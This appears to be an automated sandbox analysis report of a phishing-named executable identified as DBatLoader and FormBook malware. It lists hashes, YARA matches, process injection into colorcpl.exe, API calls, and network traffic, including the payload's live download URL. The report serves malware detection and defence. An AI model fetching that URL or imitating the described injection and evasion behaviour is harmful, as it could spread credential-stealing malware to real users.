Windows Analysis Report
Swift payment confirmation.exe

Overview

General Information

Sample name: Swift payment confirmation.exe
Analysis ID: 1545881
MD5: 92fdcc36be7b26d49f67f2f02fefbf07
SHA1: f84b37ff359f55cdfc1c60a640cc7081b523e5ce
SHA256: 61cf08eac40229e089f7630d5412aa0a8282c01d6348763d92d68e2fcb92e24e
Tags: exe, user-threatcat_ch

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Swift payment confirmation.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\Swift payment confirmation.exe" MD5: 92FDCC36BE7B26D49F67F2F02FEFBF07)
    • colorcpl.exe (PID: 4508 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
{"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh"]}
Source | Rule | Description | Author | Strings
00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1423f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source | Rule | Description | Author | Strings
2.2.colorcpl.exe.6440000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.colorcpl.exe.6440000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.colorcpl.exe.6440000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.colorcpl.exe.6440000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.Swift payment confirmation.exe.32b0000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

No Sigma rule has matched
No Suricata rule has matched


            AV Detection

            Source: Swift payment confirmation.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh"]}
            Source: Swift payment confirmation.exe | ReversingLabs: Detection: 65%
            Source: Swift payment confirmation.exe | Virustotal: Detection: 61%
            Source: Yara match | File source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Swift payment confirmation.exe | Joe Sandbox ML: detected
            Source: Swift payment confirmation.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 3.5.29.82:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: Binary string: easinvoker.pdb source: Swift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003211000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe | Code function: 0_2_032B5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5908

            Networking

            Source: Malware configuration extractor | URLs: https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe | Code function: 0_2_032CE4B8 InternetCheckConnectionA,0_2_032CE4B8
            Source: Joe Sandbox View | IP Address: 185.166.143.50
            Source: Joe Sandbox View | ASN Name: AMAZON-02US
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global traffic | HTTP traffic detected:
                GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
            Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

            E-Banking Fraud

            Source: Yara match | File source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: Swift payment confirmation.exe
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C7A2C NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C7D78 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C7A2A NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C8D6E GetThreadContext,SetThreadContext,NtResumeThread
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C8D70 GetThreadContext,SetThreadContext,NtResumeThread
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_0646C3C3 NtClose
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_0644A775 NtCreateFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D4650 NtSuspendThread
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D4340 NtSetContextThread
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2F30 NtCreateSection
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2C60 NtCreateKey
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2AD0 NtReadFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 2_2_267D39B0 NtGetContextThread
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032D8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032B44DC appears 74 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032B4860 appears 949 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032B4500 appears 33 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032B46D4 appears 244 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032C894C appears 56 times
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: String function: 032C89D0 appears 45 times
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 267D5130 appears 58 times
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 2680EA12 appears 82 times
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 2678B970 appears 280 times
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 2681F290 appears 103 times
            Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 267E7E54 appears 111 times
            Source: Swift payment confirmation.exe, Binary or memory string: OriginalFilename vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FFF000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003239000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE4F000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003235000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, 00000000.00000002.2217929734.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs Swift payment confirmation.exe
            Source: Swift payment confirmation.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine, Classification label: mal100.troj.evad.winEXE@3/0@3/3
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032B7FD2 GetDiskFreeSpaceA
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032CAD98 CreateToolhelp32Snapshot
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Code function: 0_2_032C6DC8 CoCreateInstance
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Swift payment confirmation.exe, ReversingLabs: Detection: 65%
            Source: Swift payment confirmation.exe, Virustotal: Detection: 61%
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, File read: C:\Users\user\Desktop\Swift payment confirmation.exe
            Source: unknown, Process created: C:\Users\user\Desktop\Swift payment confirmation.exe "C:\Users\user\Desktop\Swift payment confirmation.exe"
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: url.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: ieframe.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: netapi32.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: ??.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
